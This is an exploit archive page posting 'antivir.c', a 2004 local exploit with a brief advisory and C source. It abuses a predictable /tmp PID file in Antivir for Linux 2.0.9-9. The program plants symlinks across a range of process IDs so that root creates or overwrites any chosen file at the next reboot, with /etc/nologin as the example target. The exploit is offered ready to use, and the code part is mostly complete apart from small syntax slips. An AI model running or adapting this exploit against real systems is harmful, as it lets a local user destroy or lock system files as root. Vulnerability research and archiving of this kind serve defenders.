what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

antivir.c

antivir.c
Posted Jan 14, 2004
Authored by l0om | Site excluded.org

Local exploit that makes use of a symlink vulnerability that lies in Antivir for Linux version 2.0.9-9.

tags | exploit, local
systems | linux
SHA-256 | 16c3a212203098718f24a83489734c130a494f00fe79ca71a4e1ce777906a39d

antivir.c

Change Mirror Download


discovered and written: l0om <l0om@excluded.org>
date: 13.01.2004
risk: medium
page: www.excluded.org

symlink vul for Antivir / Linux Version 2.0.9-9
(maybe lower)

antivir gets started on bootup and creats a tmp file
(/tmp/.pid_antivir_$$ - where
$$ is the process id). the file got read/write
permissions for the superuser
and nothing more. the file gets created and wont be
delted till the system reboots.
well- as most of us know is the PID of a process is
not on ervery reboot the same.
so the PID of the antivir process goes +/- 10-20.

if we creat a link with the correct name
(expamle .pid_antivr_1204) which points
somewhere to the system, it will create or overwrite
the destination of our
symbolic link.

this exploits should work for most rebooting
systems, as we guess the pid of the
new process will be greater than 1000 and less than
2000. for better usage take
a look at the running procces ID and set the defined
START -20 and END +20.
sometimes one reboot does the job and sometimes it
takes two reboots.

i think the programmers could use the same method
like the guys from xmms. before
they creat anything they first "unlink" the filename
in the /tmp dir.


greets @ proxy, sirius, takt, maximilian, !ntruder,
fe2k, dna, feem, cyniker, xnet and the rest of
excluded!

example:
./antisys /etc/nologin
(reboot)
ls -l /etc/nologin
rw------- root root /etc/nologin

have phun!

*******************************************************************/

#include <stdio.h>
#include <unistd.h>
#include <string.h>

#define PATH "/tmp/.pid_antivir_"
#define START 1000
#define END 2000

int main(int argc, char **argv)
{
int i;
char buf[150];

printf("Antivir 2.0.9-9 exploit - written by l0om
\n");
printf(" WWW.EXCLUDED.ORG\n\n")

if(argc != 2) {
printf("usage: %s <destination-file>\n",argv[0]);
exit(0xff);
}

printf("### hit enter to create or overwrite file %
s: ",argv[1]); fflush(stdout);
read(1, buf, 1); fflush(stdin);

printf("working\n\n");
for(i = START; i < END; i++) {
snprintf(buf, sizeof(buf),"%s%d",PATH,i);
if(symlink(argv[1], buf) == -1) {
fprintf(stderr, "cannot creat symlink from %s to %s
[Nr.%d]\n",buf,argv[1],i);
fprintf(stderr, "skipping...\n");
}
}
printf("\ndone!\n");
printf("on the next reboot we hopefully create or
overwrite %s\n",argv[1]);
return(0x00);
}

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close